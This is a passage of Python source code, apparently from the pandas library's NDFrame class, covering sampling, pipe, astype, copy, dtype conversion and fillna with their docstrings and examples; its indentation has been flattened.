axis = self._get_axis_number(axis)
axis_length = self.shape[axis]
# Process random_state argument
rs = com.random_state(random_state)
# Check weights for compliance
if weights is not None:
# If a series, align with frame
if isinstance(weights, ABCSeries):
weights = weights.reindex(self.axes[axis])
# Strings acceptable if a dataframe and axis = 0
if isinstance(weights, str):
if isinstance(self, ABCDataFrame):
if axis == 0:
try:
weights = self[weights]
except KeyError as err:
raise KeyError(
"String passed to weights not a valid column"
) from err
else:
raise ValueError(
"Strings can only be passed to "
"weights when sampling from rows on "
"a DataFrame"
)
else:
raise ValueError(
"Strings cannot be passed as weights "
"when sampling from a Series."
)
weights = pd.Series(weights, dtype="float64")
if len(weights) != axis_length:
raise ValueError(
"Weights and axis to be sampled must be of same length"
)
if (weights == np.inf).any() or (weights == -np.inf).any():
raise ValueError("weight vector may not include `inf` values")
if (weights < 0).any():
raise ValueError("weight vector many not include negative values")
# If has nan, set to zero.
weights = weights.fillna(0)
# Renormalize if don't sum to 1
if weights.sum() != 1:
if weights.sum() != 0:
weights = weights / weights.sum()
else:
raise ValueError("Invalid weights: weights sum to zero")
weights = weights.values
# If no frac or n, default to n=1.
if n is None and frac is None:
n = 1
elif frac is not None and frac > 1 and not replace:
raise ValueError(
"Replace has to be set to `True` when "
"upsampling the population `frac` > 1."
)
elif n is not None and frac is None and n % 1 != 0:
raise ValueError("Only integers accepted as `n` values")
elif n is None and frac is not None:
n = int(round(frac * axis_length))
elif n is not None and frac is not None:
raise ValueError("Please enter a value for `frac` OR `n`, not both")
# Check for negative sizes
if n < 0:
raise ValueError(
"A negative number of rows requested. Please provide positive value."
)
locs = rs.choice(axis_length, size=n, replace=replace, p=weights)
return self.take(locs, axis=axis)
_shared_docs[
"pipe"
] = r"""
Apply func(self, \*args, \*\*kwargs).
Parameters
----------
func : function
Function to apply to the %(klass)s.
``args``, and ``kwargs`` are passed into ``func``.
Alternatively a ``(callable, data_keyword)`` tuple where
``data_keyword`` is a string indicating the keyword of
``callable`` that expects the %(klass)s.
args : iterable, optional
Positional arguments passed into ``func``.
kwargs : mapping, optional
A dictionary of keyword arguments passed into ``func``.
Returns
-------
object : the return type of ``func``.
See Also
--------
DataFrame.apply : Apply a function along input axis of DataFrame.
DataFrame.applymap : Apply a function elementwise on a whole DataFrame.
Series.map : Apply a mapping correspondence on a
:class:`~pandas.Series`.
Notes
-----
Use ``.pipe`` when chaining together functions that expect
Series, DataFrames or GroupBy objects. Instead of writing
>>> f(g(h(df), arg1=a), arg2=b, arg3=c)
You can write
>>> (df.pipe(h)
... .pipe(g, arg1=a)
... .pipe(f, arg2=b, arg3=c)
... )
If you have a function that takes the data as (say) the second
argument, pass a tuple indicating which keyword expects the
data. For example, suppose ``f`` takes its data as ``arg2``:
>>> (df.pipe(h)
... .pipe(g, arg1=a)
... .pipe((f, 'arg2'), arg1=a, arg3=c)
... )
"""
@Appender(_shared_docs["pipe"] % _shared_doc_kwargs)
def pipe(self, func, *args, **kwargs):
return com.pipe(self, func, *args, **kwargs)
_shared_docs["aggregate"] = dedent(
"""
Aggregate using one or more operations over the specified axis.
%(versionadded)s
Parameters
----------
func : function, str, list or dict
Function to use for aggregating the data. If a function, must either
work when passed a %(klass)s or when passed to %(klass)s.apply.
Accepted combinations are:
- function
- string function name
- list of functions and/or function names, e.g. ``[np.sum, 'mean']``
- dict of axis labels -> functions, function names or list of such.
%(axis)s
*args
Positional arguments to pass to `func`.
**kwargs
Keyword arguments to pass to `func`.
Returns
-------
scalar, Series or DataFrame
The return can be:
* scalar : when Series.agg is called with single function
* Series : when DataFrame.agg is called with a single function
* DataFrame : when DataFrame.agg is called with several functions
Return scalar, Series or DataFrame.
%(see_also)s
Notes
-----
`agg` is an alias for `aggregate`. Use the alias.
A passed user-defined-function will be passed a Series for evaluation.
%(examples)s"""
)
_shared_docs[
"transform"
] = """
Call ``func`` on self producing a %(klass)s with transformed values.
Produced %(klass)s will have same axis length as self.
Parameters
----------
func : function, str, list or dict
Function to use for transforming the data. If a function, must either
work when passed a %(klass)s or when passed to %(klass)s.apply.
Accepted combinations are:
- function
- string function name
- list of functions and/or function names, e.g. ``[np.exp. 'sqrt']``
- dict of axis labels -> functions, function names or list of such.
%(axis)s
*args
Positional arguments to pass to `func`.
**kwargs
Keyword arguments to pass to `func`.
Returns
-------
%(klass)s
A %(klass)s that must have the same length as self.
Raises
------
ValueError : If the returned %(klass)s has a different length than self.
See Also
--------
%(klass)s.agg : Only perform aggregating type operations.
%(klass)s.apply : Invoke function on a %(klass)s.
Examples
--------
>>> df = pd.DataFrame({'A': range(3), 'B': range(1, 4)})
>>> df
A B
0 0 1
1 1 2
2 2 3
>>> df.transform(lambda x: x + 1)
A B
0 1 2
1 2 3
2 3 4
Even though the resulting %(klass)s must have the same length as the
input %(klass)s, it is possible to provide several input functions:
>>> s = pd.Series(range(3))
>>> s
0 0
1 1
2 2
dtype: int64
>>> s.transform([np.sqrt, np.exp])
sqrt exp
0 0.000000 1.000000
1 1.000000 2.718282
2 1.414214 7.389056
"""
# ----------------------------------------------------------------------
# Attribute access
def __finalize__(
self: FrameOrSeries, other, method=None, **kwargs
) -> FrameOrSeries:
"""
Propagate metadata from other to self.
Parameters
----------
other : the object from which to get the attributes that we are going
to propagate
method : optional, a passed method name ; possibly to take different
types of propagation actions based on this
"""
if isinstance(other, NDFrame):
for name in other.attrs:
self.attrs[name] = other.attrs[name]
# For subclasses using _metadata.
for name in self._metadata:
assert isinstance(name, str)
object.__setattr__(self, name, getattr(other, name, None))
return self
def __getattr__(self, name: str):
"""
After regular attribute access, try looking up the name
This allows simpler access to columns for interactive use.
"""
# Note: obj.x will always call obj.__getattribute__('x') prior to
# calling obj.__getattr__('x').
if (
name in self._internal_names_set
or name in self._metadata
or name in self._accessors
):
return object.__getattribute__(self, name)
else:
if self._info_axis._can_hold_identifiers_and_holds_name(name):
return self[name]
return object.__getattribute__(self, name)
def __setattr__(self, name: str, value) -> None:
"""
After regular attribute access, try setting the name
This allows simpler access to columns for interactive use.
"""
# first try regular attribute access via __getattribute__, so that
# e.g. ``obj.x`` and ``obj.x = 4`` will always reference/modify
# the same attribute.
try:
object.__getattribute__(self, name)
return object.__setattr__(self, name, value)
except AttributeError:
pass
# if this fails, go on to more involved attribute setting
# (note that this matches __getattr__, above).
if name in self._internal_names_set:
object.__setattr__(self, name, value)
elif name in self._metadata:
object.__setattr__(self, name, value)
else:
try:
existing = getattr(self, name)
if isinstance(existing, Index):
object.__setattr__(self, name, value)
elif name in self._info_axis:
self[name] = value
else:
object.__setattr__(self, name, value)
except (AttributeError, TypeError):
if isinstance(self, ABCDataFrame) and (is_list_like(value)):
warnings.warn(
"Pandas doesn't allow columns to be "
"created via a new attribute name - see "
"https://pandas.pydata.org/pandas-docs/"
"stable/indexing.html#attribute-access",
stacklevel=2,
)
object.__setattr__(self, name, value)
def _dir_additions(self):
"""
add the string-like attributes from the info_axis.
If info_axis is a MultiIndex, it's first level values are used.
"""
additions = {
c
for c in self._info_axis.unique(level=0)[:100]
if isinstance(c, str) and c.isidentifier()
}
return super()._dir_additions().union(additions)
# ----------------------------------------------------------------------
# Consolidation of internals
def _protect_consolidate(self, f):
"""
Consolidate _data -- if the blocks have changed, then clear the
cache
"""
blocks_before = len(self._data.blocks)
result = f()
if len(self._data.blocks) != blocks_before:
self._clear_item_cache()
return result
def _consolidate_inplace(self) -> None:
"""Consolidate data in place and return None"""
def f():
self._data = self._data.consolidate()
self._protect_consolidate(f)
def _consolidate(self, inplace: bool_t = False):
"""
Compute NDFrame with "consolidated" internals (data of each dtype
grouped together in a single ndarray).
Parameters
----------
inplace : bool, default False
If False return new object, otherwise modify existing object.
Returns
-------
consolidated : same type as caller
"""
inplace = validate_bool_kwarg(inplace, "inplace")
if inplace:
self._consolidate_inplace()
else:
f = lambda: self._data.consolidate()
cons_data = self._protect_consolidate(f)
return self._constructor(cons_data).__finalize__(self)
@property
def _is_mixed_type(self) -> bool_t:
f = lambda: self._data.is_mixed_type
return self._protect_consolidate(f)
@property
def _is_numeric_mixed_type(self) -> bool_t:
f = lambda: self._data.is_numeric_mixed_type
return self._protect_consolidate(f)
def _check_inplace_setting(self, value) -> bool_t:
""" check whether we allow in-place setting with this type of value """
if self._is_mixed_type:
if not self._is_numeric_mixed_type:
# allow an actual np.nan thru
if is_float(value) and np.isnan(value):
return True
raise TypeError(
"Cannot do inplace boolean setting on "
"mixed-types with a non np.nan value"
)
return True
def _get_numeric_data(self):
return self._constructor(self._data.get_numeric_data()).__finalize__(self)
def _get_bool_data(self):
return self._constructor(self._data.get_bool_data()).__finalize__(self)
# ----------------------------------------------------------------------
# Internal Interface Methods
@property
def values(self) -> np.ndarray:
"""
Return a Numpy representation of the DataFrame.
.. warning::
We recommend using :meth:`DataFrame.to_numpy` instead.
Only the values in the DataFrame will be returned, the axes labels
will be removed.
Returns
-------
numpy.ndarray
The values of the DataFrame.
See Also
--------
DataFrame.to_numpy : Recommended alternative to this method.
DataFrame.index : Retrieve the index labels.
DataFrame.columns : Retrieving the column names.
Notes
-----
The dtype will be a lower-common-denominator dtype (implicit
upcasting); that is to say if the dtypes (even of numeric types)
are mixed, the one that accommodates all will be chosen. Use this
with care if you are not dealing with the blocks.
e.g. If the dtypes are float16 and float32, dtype will be upcast to
float32. If dtypes are int32 and uint8, dtype will be upcast to
int32. By :func:`numpy.find_common_type` convention, mixing int64
and uint64 will result in a float64 dtype.
Examples
--------
A DataFrame where all columns are the same type (e.g., int64) results
in an array of the same type.
>>> df = pd.DataFrame({'age': [ 3, 29],
... 'height': [94, 170],
... 'weight': [31, 115]})
>>> df
age height weight
0 3 94 31
1 29 170 115
>>> df.dtypes
age int64
height int64
weight int64
dtype: object
>>> df.values
array([[ 3, 94, 31],
[ 29, 170, 115]], dtype=int64)
A DataFrame with mixed type columns(e.g., str/object, int64, float32)
results in an ndarray of the broadest type that accommodates these
mixed types (e.g., object).
>>> df2 = pd.DataFrame([('parrot', 24.0, 'second'),
... ('lion', 80.5, 1),
... ('monkey', np.nan, None)],
... columns=('name', 'max_speed', 'rank'))
>>> df2.dtypes
name object
max_speed float64
rank object
dtype: object
>>> df2.values
array([['parrot', 24.0, 'second'],
['lion', 80.5, 1],
['monkey', nan, None]], dtype=object)
"""
self._consolidate_inplace()
return self._data.as_array(transpose=self._AXIS_REVERSED)
@property
def _values(self) -> np.ndarray:
"""internal implementation"""
return self.values
def _internal_get_values(self) -> np.ndarray:
"""
Return an ndarray after converting sparse values to dense.
This is the same as ``.values`` for non-sparse data. For sparse
data contained in a `SparseArray`, the data are first
converted to a dense representation.
Returns
-------
numpy.ndarray
Numpy representation of DataFrame.
See Also
--------
values : Numpy representation of DataFrame.
SparseArray : Container for sparse data.
"""
return self.values
@property
def dtypes(self):
"""
Return the dtypes in the DataFrame.
This returns a Series with the data type of each column.
The result's index is the original DataFrame's columns. Columns
with mixed types are stored with the ``object`` dtype. See
:ref:`the User Guide <basics.dtypes>` for more.
Returns
-------
pandas.Series
The data type of each column.
Examples
--------
>>> df = pd.DataFrame({'float': [1.0],
... 'int': [1],
... 'datetime': [pd.Timestamp('20180310')],
... 'string': ['foo']})
>>> df.dtypes
float float64
int int64
datetime datetime64[ns]
string object
dtype: object
"""
from pandas import Series
return Series(self._data.get_dtypes(), index=self._info_axis, dtype=np.object_)
def _to_dict_of_blocks(self, copy: bool_t = True):
"""
Return a dict of dtype -> Constructor Types that
each is a homogeneous dtype.
Internal ONLY
"""
return {
k: self._constructor(v).__finalize__(self)
for k, v, in self._data.to_dict(copy=copy).items()
}
def astype(
self: FrameOrSeries, dtype, copy: bool_t = True, errors: str = "raise"
) -> FrameOrSeries:
"""
Cast a pandas object to a specified dtype ``dtype``.
Parameters
----------
dtype : data type, or dict of column name -> data type
Use a numpy.dtype or Python type to cast entire pandas object to
the same type. Alternatively, use {col: dtype, ...}, where col is a
column label and dtype is a numpy.dtype or Python type to cast one
or more of the DataFrame's columns to column-specific types.
copy : bool, default True
Return a copy when ``copy=True`` (be very careful setting
``copy=False`` as changes to values then may propagate to other
pandas objects).
errors : {'raise', 'ignore'}, default 'raise'
Control raising of exceptions on invalid data for provided dtype.
- ``raise`` : allow exceptions to be raised
- ``ignore`` : suppress exceptions. On error return original object.
Returns
-------
casted : same type as caller
See Also
--------
to_datetime : Convert argument to datetime.
to_timedelta : Convert argument to timedelta.
to_numeric : Convert argument to a numeric type.
numpy.ndarray.astype : Cast a numpy array to a specified type.
Examples
--------
Create a DataFrame:
>>> d = {'col1': [1, 2], 'col2': [3, 4]}
>>> df = pd.DataFrame(data=d)
>>> df.dtypes
col1 int64
col2 int64
dtype: object
Cast all columns to int32:
>>> df.astype('int32').dtypes
col1 int32
col2 int32
dtype: object
Cast col1 to int32 using a dictionary:
>>> df.astype({'col1': 'int32'}).dtypes
col1 int32
col2 int64
dtype: object
Create a series:
>>> ser = pd.Series([1, 2], dtype='int32')
>>> ser
0 1
1 2
dtype: int32
>>> ser.astype('int64')
0 1
1 2
dtype: int64
Convert to categorical type:
>>> ser.astype('category')
0 1
1 2
dtype: category
Categories (2, int64): [1, 2]
Convert to ordered categorical type with custom ordering:
>>> cat_dtype = pd.api.types.CategoricalDtype(
... categories=[2, 1], ordered=True)
>>> ser.astype(cat_dtype)
0 1
1 2
dtype: category
Categories (2, int64): [2 < 1]
Note that using ``copy=False`` and changing data on a new
pandas object may propagate changes:
>>> s1 = pd.Series([1, 2])
>>> s2 = s1.astype('int64', copy=False)
>>> s2[0] = 10
>>> s1 # note that s1[0] has changed too
0 10
1 2
dtype: int64
"""
if is_dict_like(dtype):
if self.ndim == 1: # i.e. Series
if len(dtype) > 1 or self.name not in dtype:
raise KeyError(
"Only the Series name can be used for "
"the key in Series dtype mappings."
)
new_type = dtype[self.name]
return self.astype(new_type, copy, errors)
for col_name in dtype.keys():
if col_name not in self:
raise KeyError(
"Only a column name can be used for the "
"key in a dtype mappings argument."
)
results = []
for col_name, col in self.items():
if col_name in dtype:
results.append(
col.astype(dtype=dtype[col_name], copy=copy, errors=errors)
)
else:
results.append(col.copy() if copy else col)
elif is_extension_array_dtype(dtype) and self.ndim > 1:
# GH 18099/22869: columnwise conversion to extension dtype
# GH 24704: use iloc to handle duplicate column names
results = [
self.iloc[:, i].astype(dtype, copy=copy)
for i in range(len(self.columns))
]
else:
# else, only a single dtype is given
new_data = self._data.astype(dtype=dtype, copy=copy, errors=errors)
return self._constructor(new_data).__finalize__(self)
# GH 19920: retain column metadata after concat
result = pd.concat(results, axis=1, copy=False)
result.columns = self.columns
return result
def copy(self: FrameOrSeries, deep: bool_t = True) -> FrameOrSeries:
"""
Make a copy of this object's indices and data.
When ``deep=True`` (default), a new object will be created with a
copy of the calling object's data and indices. Modifications to
the data or indices of the copy will not be reflected in the
original object (see notes below).
When ``deep=False``, a new object will be created without copying
the calling object's data or index (only references to the data
and index are copied). Any changes to the data of the original
will be reflected in the shallow copy (and vice versa).
Parameters
----------
deep : bool, default True
Make a deep copy, including a copy of the data and the indices.
With ``deep=False`` neither the indices nor the data are copied.
Returns
-------
copy : Series or DataFrame
Object type matches caller.
Notes
-----
When ``deep=True``, data is copied but actual Python objects
will not be copied recursively, only the reference to the object.
This is in contrast to `copy.deepcopy` in the Standard Library,
which recursively copies object data (see examples below).
While ``Index`` objects are copied when ``deep=True``, the underlying
numpy array is not copied for performance reasons. Since ``Index`` is
immutable, the underlying data can be safely shared and a copy
is not needed.
Examples
--------
>>> s = pd.Series([1, 2], index=["a", "b"])
>>> s
a 1
b 2
dtype: int64
>>> s_copy = s.copy()
>>> s_copy
a 1
b 2
dtype: int64
**Shallow copy versus default (deep) copy:**
>>> s = pd.Series([1, 2], index=["a", "b"])
>>> deep = s.copy()
>>> shallow = s.copy(deep=False)
Shallow copy shares data and index with original.
>>> s is shallow
False
>>> s.values is shallow.values and s.index is shallow.index
True
Deep copy has own copy of data and index.
>>> s is deep
False
>>> s.values is deep.values or s.index is deep.index
False
Updates to the data shared by shallow copy and original is reflected
in both; deep copy remains unchanged.
>>> s[0] = 3
>>> shallow[1] = 4
>>> s
a 3
b 4
dtype: int64
>>> shallow
a 3
b 4
dtype: int64
>>> deep
a 1
b 2
dtype: int64
Note that when copying an object containing Python objects, a deep copy
will copy the data, but will not do so recursively. Updating a nested
data object will be reflected in the deep copy.
>>> s = pd.Series([[1, 2], [3, 4]])
>>> deep = s.copy()
>>> s[0][0] = 10
>>> s
0 [10, 2]
1 [3, 4]
dtype: object
>>> deep
0 [10, 2]
1 [3, 4]
dtype: object
"""
data = self._data.copy(deep=deep)
return self._constructor(data).__finalize__(self)
def __copy__(self: FrameOrSeries, deep: bool_t = True) -> FrameOrSeries:
return self.copy(deep=deep)
def __deepcopy__(self: FrameOrSeries, memo=None) -> FrameOrSeries:
"""
Parameters
----------
memo, default None
Standard signature. Unused
"""
return self.copy(deep=True)
def _convert(
self: FrameOrSeries,
datetime: bool_t = False,
numeric: bool_t = False,
timedelta: bool_t = False,
coerce: bool_t = False,
copy: bool_t = True,
) -> FrameOrSeries:
"""
Attempt to infer better dtype for object columns
Parameters
----------
datetime : bool, default False
If True, convert to date where possible.
numeric : bool, default False
If True, attempt to convert to numbers (including strings), with
unconvertible values becoming NaN.
timedelta : bool, default False
If True, convert to timedelta where possible.
coerce : bool, default False
If True, force conversion with unconvertible values converted to
nulls (NaN or NaT).
copy : bool, default True
If True, return a copy even if no copy is necessary (e.g. no
conversion was done). Note: This is meant for internal use, and
should not be confused with inplace.
Returns
-------
converted : same as input object
"""
validate_bool_kwarg(datetime, "datetime")
validate_bool_kwarg(numeric, "numeric")
validate_bool_kwarg(timedelta, "timedelta")
validate_bool_kwarg(coerce, "coerce")
validate_bool_kwarg(copy, "copy")
return self._constructor(
self._data.convert(
datetime=datetime,
numeric=numeric,
timedelta=timedelta,
coerce=coerce,
copy=copy,
)
).__finalize__(self)
def infer_objects(self: FrameOrSeries) -> FrameOrSeries:
"""
Attempt to infer better dtypes for object columns.
Attempts soft conversion of object-dtyped
columns, leaving non-object and unconvertible
columns unchanged. The inference rules are the
same as during normal Series/DataFrame construction.
.. versionadded:: 0.21.0
Returns
-------
converted : same type as input object
See Also
--------
to_datetime : Convert argument to datetime.
to_timedelta : Convert argument to timedelta.
to_numeric : Convert argument to numeric type.
convert_dtypes : Convert argument to best possible dtype.
Examples
--------
>>> df = pd.DataFrame({"A": ["a", 1, 2, 3]})
>>> df = df.iloc[1:]
>>> df
A
1 1
2 2
3 3
>>> df.dtypes
A object
dtype: object
>>> df.infer_objects().dtypes
A int64
dtype: object
"""
# numeric=False necessary to only soft convert;
# python objects will still be converted to
# native numpy numeric types
return self._constructor(
self._data.convert(
datetime=True, numeric=False, timedelta=True, coerce=False, copy=True
)
).__finalize__(self)
def convert_dtypes(
self: FrameOrSeries,
infer_objects: bool_t = True,
convert_string: bool_t = True,
convert_integer: bool_t = True,
convert_boolean: bool_t = True,
) -> FrameOrSeries:
"""
Convert columns to best possible dtypes using dtypes supporting ``pd.NA``.
.. versionadded:: 1.0.0
Parameters
----------
infer_objects : bool, default True
Whether object dtypes should be converted to the best possible types.
convert_string : bool, default True
Whether object dtypes should be converted to ``StringDtype()``.
convert_integer : bool, default True
Whether, if possible, conversion can be done to integer extension types.
convert_boolean : bool, defaults True
Whether object dtypes should be converted to ``BooleanDtypes()``.
Returns
-------
Series or DataFrame
Copy of input object with new dtype.
See Also
--------
infer_objects : Infer dtypes of objects.
to_datetime : Convert argument to datetime.
to_timedelta : Convert argument to timedelta.
to_numeric : Convert argument to a numeric type.
Notes
-----
By default, ``convert_dtypes`` will attempt to convert a Series (or each
Series in a DataFrame) to dtypes that support ``pd.NA``. By using the options
``convert_string``, ``convert_integer``, and ``convert_boolean``, it is
possible to turn off individual conversions to ``StringDtype``, the integer
extension types or ``BooleanDtype``, respectively.
For object-dtyped columns, if ``infer_objects`` is ``True``, use the inference
rules as during normal Series/DataFrame construction. Then, if possible,
convert to ``StringDtype``, ``BooleanDtype`` or an appropriate integer extension
type, otherwise leave as ``object``.
If the dtype is integer, convert to an appropriate integer extension type.
If the dtype is numeric, and consists of all integers, convert to an
appropriate integer extension type.
In the future, as new dtypes are added that support ``pd.NA``, the results
of this method will change to support those new dtypes.
Examples
--------
>>> df = pd.DataFrame(
... {
... "a": pd.Series([1, 2, 3], dtype=np.dtype("int32")),
... "b": pd.Series(["x", "y", "z"], dtype=np.dtype("O")),
... "c": pd.Series([True, False, np.nan], dtype=np.dtype("O")),
... "d": pd.Series(["h", "i", np.nan], dtype=np.dtype("O")),
... "e": pd.Series([10, np.nan, 20], dtype=np.dtype("float")),
... "f": pd.Series([np.nan, 100.5, 200], dtype=np.dtype("float")),
... }
... )
Start with a DataFrame with default dtypes.
>>> df
a b c d e f
0 1 x True h 10.0 NaN
1 2 y False i NaN 100.5
2 3 z NaN NaN 20.0 200.0
>>> df.dtypes
a int32
b object
c object
d object
e float64
f float64
dtype: object
Convert the DataFrame to use best possible dtypes.
>>> dfn = df.convert_dtypes()
>>> dfn
a b c d e f
0 1 x True h 10 NaN
1 2 y False i <NA> 100.5
2 3 z <NA> <NA> 20 200.0
>>> dfn.dtypes
a Int32
b string
c boolean
d string
e Int64
f float64
dtype: object
Start with a Series of strings and missing data represented by ``np.nan``.
>>> s = pd.Series(["a", "b", np.nan])
>>> s
0 a
1 b
2 NaN
dtype: object
Obtain a Series with dtype ``StringDtype``.
>>> s.convert_dtypes()
0 a
1 b
2 <NA>
dtype: string
"""
if self.ndim == 1:
return self._convert_dtypes(
infer_objects, convert_string, convert_integer, convert_boolean
)
else:
results = [
col._convert_dtypes(
infer_objects, convert_string, convert_integer, convert_boolean
)
for col_name, col in self.items()
]
result = pd.concat(results, axis=1, copy=False)
return result
# ----------------------------------------------------------------------
# Filling NA's
@doc(**_shared_doc_kwargs)
def fillna(
self: FrameOrSeries,
value=None,
method=None,
axis=None,
inplace: bool_t = False,
limit=None,
downcast=None,
) -> Optional[FrameOrSeries]:
"""
Fill NA/NaN values using the specified method.
Parameters
----------
value : scalar, dict, Series, or DataFrame
Value to use to fill holes (e.g. 0), alternately a
dict/Series/DataFrame of values specifying which value to use for
each index (for a Series) or column (for a DataFrame). Values not
in the dict/Series/DataFrame will not be filled. This value cannot
be a list.
method : {{'backfill', 'bfill', 'pad', 'ffill', None}}, default None
Method to use for filling holes in reindexed Series
pad / ffill: propagate last valid observation forward to next valid
backfill / bfill: use next valid observation to fill gap.
axis : {axes_single_arg}
Axis along which to fill missing values.
inplace : bool, default False
If True, fill in-place. Note: this will modify any
other views on this object (e.g., a no-copy slice for a column in a
DataFrame).
limit : int, default None
If method is specified, this is the maximum number of consecutive
NaN values to forward/backward fill. In other words, if there is
a gap with more than this number of consecutive NaNs, it will only
be partially filled. If method is not specified, this is the
maximum number of entries along the entire axis where NaNs will be
filled. Must be greater than 0 if not None.
downcast : dict, default is None
A dict of item->dtype of what to downcast if possible,
or the string 'infer' which will try to downcast to an appropriate
equal type (e.g. float64 to int64 if possible).
Returns
-------
{klass} or None
Object with missing values filled or None if ``inplace=True``.
See Also
--------
interpolate : Fill NaN values using interpolation.
reindex : Conform object to new index.
asfreq : Convert TimeSeries to specified frequency.
Examples
--------
>>> df = pd.DataFrame([[np.nan, 2, np.nan, 0],
... [3, 4, np.nan, 1],
... [np.nan, np.nan, np.nan, 5],
... [np.nan, 3, np.nan, 4]],
... columns=list('ABCD'))
>>> df
A B C D
0 NaN 2.0 NaN 0
1 3.0 4.0 NaN 1
2 NaN NaN NaN 5
3 NaN 3.0 NaN 4
Replace all NaN elements with 0s.
>>> df.fillna(0)
A B C D
0 0.0 2.0 0.0 0
1 3.0 4.0 0.0 1
2 0.0 0.0 0.0 5
3 0.0 3.0 0.0 4
We can also propagate non-null values forward or backward.
>>> df.fillna(method='ffill')
A B C D
0 NaN 2.0 NaN 0
1 3.0 4.0 NaN 1
2 3.0 4.0 NaN 5
3 3.0 3.0 NaN 4
Replace all NaN elements in column 'A', 'B', 'C', and 'D', with 0, 1,
2, and 3 respectively.
>>> values = {{'A': 0, 'B': 1, 'C': 2, 'D': 3}}
>>> df.fillna(value=values)
A B C D
0 0.0 2.0 2.0 0
1 3.0 4.0 2.0 1
2 0.0 1.0 2.0 5
3 0.0 3.0 2.0 4
Only replace the first NaN element.
>>> df.fillna(value=values, limit=1)
A B C D
0 0.0 2.0 2.0 0
1 3.0 4.0 NaN 1
2 NaN 1.0 NaN 5
3 NaN 3.0 NaN 4
"""
inplace = validate_bool_kwarg(inplace, "inplace")
value, method = validate_fillna_kwargs(value, method)
self._consolidate_inplace()
# set the default here, so functions examining the signaure
# can detect if something was set (e.g. in groupby) (GH9221)
if axis is None:
axis = 0
axis = self._get_axis_number(axis)
if value is None:
if self._is_mixed_type and axis == 1:
if inplace:
raise NotImplementedError()
result = self.T.fillna(method=method, limit=limit).T
# need to downcast here because of all of the transposes
result._data = result._data.downcast()
return result
new_data = self._data.interpolate(
method=method,
axis=axis,
limit=limit,
inplace=inplace,
coerce=True,
downcast=downcast,
)
else:
if len(self._get_axis(axis)) == 0:
return self
if self.ndim == 1:
if isinstance(value, (dict, ABCSeries)):
value = create_series_with_explicit_dtype(
value, dtype_if_empty=object
)
elif not is_list_like(value):
pass
else:
raise TypeError(
'"value" parameter must be a scalar, dict '
"or Series, but you passed a "
f'"{type(value).__name__}"'
)
new_data = self._data.fillna(
value=value, limit=limit, inplace=inplace, downcast=downcast
)
elif isinstance(value, (dict, ABCSeries)):
if axis == 1:
raise NotImplementedError(
"Currently only can fill "
"with dict/Series column "
"by column"
)
result = self if inplace else self.copy()
for k, v in value.items():
if k not in result:
continue
obj = result[k]
obj.fillna(v, limit=limit, inplace=True, downcast=downcast)
return result if not inplace else None
elif not is_list_like(value):
new_data = self._data.fillna(
value=value, limit=limit, inplace=inplace, downcast=downcast
)
elif isinstance(value, ABCDataFrame) and self.ndim == 2:
new_data = self.where(self.notna(), value)
else:
raise ValueError(f"invalid fill value with a {type(value)}")
if inplace:
self._update_inplace(new_data)
return None
else:
return self._constructor(new_data).__finalize__(self)
def ffill(
self: FrameOrSeries,
axis=None,
inplace: bool_t = False,
limit=None,
downcast=None,
) -> Optional[FrameOrSeries]:
"""
Synonym for :meth:`DataFrame.fillna` with ``method='ffill'``.
Returns
-------
%(klass)s or None
Object with missing values filled or None if ``inplace=True``.
"""
return self.fillna(
method="ffill", axis=axis, inplace=inplace, limit=limit, downcast=downcast
)
def bfill(
self: FrameOrSeries,
axis=None,
inplace: bool_t = False,
limit=None,
downcast=None,
) -> Optional[FrameOrSeries]:
"""
Synonym for :meth:`DataFrame.fillna` with ``method='bfill'``.
Returns
-------
%(klass)s or None
Object with missing values filled or None if ``inplace=True``.
"""
return self.fillna(
method="bfill", axis=axis, inplace=inplace, limit=limit, downcast=downcast
)
_shared_docs[
"replace"
] = """
Replace values given in `to_replace` with `value`.
Values of the %(klass)s are replaced with other values dynamically.
This differs from updating with ``.loc`` or ``.iloc``, which require
you to specify a location to update with some value.
Parameters
----------
to_replace : str, regex, list, dict, Series, int, float, or None
How to find the values that will be replaced.
* numeric, str or regex:
- numeric: numeric values equal to `to_replace` will be
replaced with `value`
- str: string exactly matching `to_replace` will be replaced
with `value`
- regex: regexs matching `to_replace` will be replaced with
`value`
* list of str, regex, or numeric:
- First, if `to_replace` and `value` are both lists, they
**must** be the same length.
- Second, if ``regex=True`` then all of the strings in **both**
lists will be interpreted as regexs otherwise they will match
directly. This doesn't matter much for `value` since there
are only a few possible substitution regexes you can use.
- str, regex and numeric rules apply as above.
* dict:
- Dicts can be used to specify different replacement values
for different existing values. For example,
``{'a': 'b', 'y': 'z'}`` replaces the value 'a' with 'b' and
'y' with 'z'. To use a dict in this way the `value`
parameter should be `None`.
- For a DataFrame a dict can specify that different values
should be replaced in different columns. For example,
``{'a': 1, 'b': 'z'}`` looks for the value 1 in column 'a'
and the value 'z' in column 'b' and replaces these values
with whatever is specified in `value`. The `value` parameter
should not be ``None`` in this case. You can treat this as a
special case of passing two lists except that you are
specifying the column to search in.
- For a DataFrame nested dictionaries, e.g.,
``{'a': {'b': np.nan}}``, are read as follows: look in column
'a' for the value 'b' and replace it with NaN. The `value`
parameter should be ``None`` to use a nested dict in this
way. You can nest regular expressions as well. Note that
column names (the top-level dictionary keys in a nested
dictionary) **cannot** be regular expressions.
* None:
- This means that the `regex` argument must be a string,
compiled regular expression, or list, dict, ndarray or
Series of such elements. If `value` is also ``None`` then
this **must** be a nested dictionary or Series.
See the examples section for examples of each of these.
value : scalar, dict, list, str, regex, default None
Value to replace any values matching `to_replace` with.
For a DataFrame a dict of values can be used to specify which
value to use for each column (columns not in the dict will not be
filled). Regular expressions, strings and lists or dicts of such
objects are also allowed.
inplace : bool, default False
If True, in place. Note: this will modify any
other views on this object (e.g. a column from a DataFrame).
Returns the caller if this is True.
limit : int, default None
Maximum size gap to forward or backward fill.
regex : bool or same types as `to_replace`, default False
Whether to interpret `to_replace` and/or `value` as regular
expressions. If this is ``True`` then `to_replace` *must* be a
string. Alternatively, this could be a regular expression or a
list, dict, or array of regular expressions in which case
`to_replace` must be ``None``.
method : {'pad', 'ffill', 'bfill', `None`}
The method to use when for replacement, when `to_replace` is a
scalar, list or tuple and `value` is ``None``.
.. versionchanged:: 0.23.0
Added to DataFrame.
Returns
-------
%(klass)s
Object after replacement.
Raises
------
AssertionError
* If `regex` is not a ``bool`` and `to_replace` is not
``None``.
TypeError
* If `to_replace` is not a scalar, array-like, ``dict``, or ``None``
* If `to_replace` is a ``dict`` and `value` is not a ``list``,
``dict``, ``ndarray``, or ``Series``
* If `to_replace` is ``None`` and `regex` is not compilable
into a regular expression or is a list, dict, ndarray, or
Series.
